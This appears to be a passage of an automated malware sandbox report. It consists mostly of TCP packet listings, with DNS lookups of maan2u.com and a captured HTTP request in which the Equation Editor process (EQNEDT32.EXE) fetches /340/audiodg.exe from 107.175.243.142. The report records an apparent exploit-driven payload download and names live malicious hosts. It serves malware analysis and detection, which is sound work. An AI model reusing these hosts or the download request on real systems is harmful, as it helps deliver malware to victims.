                                        Sep 25, 2024 09:43:31.096117020 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.304821968 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.388654947 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.388669014 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.388710976 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.388731956 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.388747931 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.388760090 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.388817072 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.388840914 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.389281034 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.389292002 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.389319897 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.389337063 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.389342070 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.389362097 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.389373064 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.389390945 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.389431000 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.389926910 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.389935017 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.389957905 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.389966965 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.389992952 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.390003920 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.390028000 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.390343904 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.390376091 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.390383959 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.390399933 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.390408993 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.390419006 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.390429974 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.390458107 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.391081095 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.391102076 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.391140938 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.391149044 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.391166925 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.393524885 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.393553019 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.393589020 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.393595934 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.393610001 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.393970966 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.791086912 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.791116953 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.791213989 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.791244984 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.791930914 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.791959047 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.791999102 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.792007923 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.792020082 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.792448044 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.792469025 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.792501926 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.792510033 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.792520046 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.793560028 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.793585062 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.793627977 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.793634892 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.793647051 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.793652058 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.793674946 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.793693066 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.793699980 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.793731928 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.793781042 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.794518948 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.794560909 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.794711113 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.794724941 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.795335054 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.795381069 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.795389891 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.795403004 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.795439005 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.795557976 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.795598030 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.795614004 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.795622110 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.795644999 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.817239046 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.877804995 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.877830982 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.877955914 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:31.877974033 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:31.950710058 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.024679899 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.024689913 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.024720907 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.024748087 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.024821043 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.024848938 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.024863005 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.025412083 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.025439024 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.025473118 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.025481939 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.025497913 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.026042938 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.026061058 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.026098013 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.026107073 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.026117086 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.026844025 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.026868105 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.026902914 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.026911974 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.026926994 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.027147055 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.027167082 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.027199984 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.027208090 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.027220011 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.028073072 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.028098106 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.028136969 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.028146029 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.028163910 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.028964043 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.028984070 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.029036045 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.029042959 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.029051065 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.029068947 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.029077053 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.029104948 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.029113054 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.029141903 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.079216957 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.111582041 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.111610889 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.111701965 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.111720085 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.258403063 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.258435965 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.258493900 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.258513927 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.258656979 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.258821011 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.258829117 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.258848906 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.258857012 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.258882999 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.258896112 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.258919001 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.259387970 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.259403944 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.259430885 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.259438992 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.259440899 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.259469032 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.259485960 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.260093927 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.260122061 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.260159016 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.260169029 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.260188103 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.260951996 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.260979891 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.261009932 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.261017084 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.261039972 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.261059046 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.261080980 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.261117935 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.261126041 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.261152029 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.262062073 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.262088060 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.262120962 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.262129068 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.262151957 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.262942076 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.262962103 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.262995005 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.263004065 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.263020992 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.293963909 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.345633984 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.345664978 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.345776081 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.345805883 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.490793943 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.490825891 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.490926981 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.490948915 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.491702080 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.491708994 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.491724968 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.491733074 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.491857052 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.491857052 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.491868973 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.492198944 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.492224932 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.492232084 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.492249012 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.492254972 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.492270947 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.492291927 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.492315054 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.492753029 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.492774010 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.492811918 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.492819071 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.492841005 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.493266106 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.493292093 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.493321896 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.493329048 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.493351936 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.493861914 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.493882895 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.493915081 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.493925095 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.493942976 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.494318962 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.494344950 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.494378090 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.494385004 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.494417906 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.495048046 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.495069027 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.495115995 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.495125055 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.495142937 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.579189062 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.579227924 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.579351902 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.579391956 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.579927921 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.579951048 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.579957962 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.580085039 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.580085039 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.580094099 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.603019953 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.603050947 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.603270054 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.603281975 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.705837011 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.725951910 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.725964069 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726008892 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726023912 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726026058 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726051092 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726110935 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726119041 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726567984 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726598978 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726618052 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726632118 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726645947 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.726655006 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726655006 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.726680994 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.727423906 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.727444887 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.727495909 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.727503061 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.727515936 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.728146076 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728171110 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728195906 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.728204012 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728228092 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728228092 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.728254080 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728275061 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.728283882 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.728292942 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.728312016 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.729311943 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.729336023 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.729373932 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.729387999 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.729398012 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.730097055 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.730117083 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.730148077 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.730155945 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.730165958 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.731009007 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731034040 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731060982 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.731069088 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731077909 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.731085062 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731127024 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.731136084 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731151104 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.731188059 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.759232998 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.762161016 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.762175083 CEST44349165112.137.173.77192.168.2.22
                                        Sep 25, 2024 09:43:32.762198925 CEST49165443192.168.2.22112.137.173.77
                                        Sep 25, 2024 09:43:32.762204885 CEST44349165112.137.173.77192.168.2.22

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 25, 2024 09:43:28.313214064 CEST5456253192.168.2.228.8.8.8
                                        Sep 25, 2024 09:43:28.319729090 CEST53545628.8.8.8192.168.2.22
                                        Sep 25, 2024 09:43:28.375128031 CEST5291753192.168.2.228.8.8.8
                                        Sep 25, 2024 09:43:28.382281065 CEST53529178.8.8.8192.168.2.22
                                        Sep 25, 2024 09:43:28.386998892 CEST6275153192.168.2.228.8.8.8
                                        Sep 25, 2024 09:43:28.393954039 CEST53627518.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Sep 25, 2024 09:43:28.313214064 CEST192.168.2.228.8.8.80x8f30Standard query (0)maan2u.comA (IP address)IN (0x0001)false
                                        Sep 25, 2024 09:43:28.375128031 CEST192.168.2.228.8.8.80xe638Standard query (0)maan2u.comA (IP address)IN (0x0001)false
                                        Sep 25, 2024 09:43:28.386998892 CEST192.168.2.228.8.8.80x2225Standard query (0)maan2u.comA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Sep 25, 2024 09:43:28.319729090 CEST8.8.8.8192.168.2.220x8f30No error (0)maan2u.com112.137.173.77A (IP address)IN (0x0001)false
                                        Sep 25, 2024 09:43:28.382281065 CEST8.8.8.8192.168.2.220xe638No error (0)maan2u.com112.137.173.77A (IP address)IN (0x0001)false
                                        Sep 25, 2024 09:43:28.393954039 CEST8.8.8.8192.168.2.220x2225No error (0)maan2u.com112.137.173.77A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • maan2u.com
                                        • 107.175.243.142

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.2249163107.175.243.142803620C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampBytes transferredDirectionData
                                        Sep 25, 2024 09:43:25.859515905 CEST317OUTGET /340/audiodg.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 107.175.243.142
                                        Connection: Keep-Alive
                                        Sep 25, 2024 09:43:26.396387100 CEST1236INHTTP/1.1 200 OK
                                        Date: Wed, 25 Sep 2024 07:43:26 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Last-Modified: Wed, 25 Sep 2024 00:08:41 GMT
                                        ETag: "109c00-622e66ca7c781"
                                        Accept-Ranges: bytes
                                        Content-Length: 1088512
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/lnk
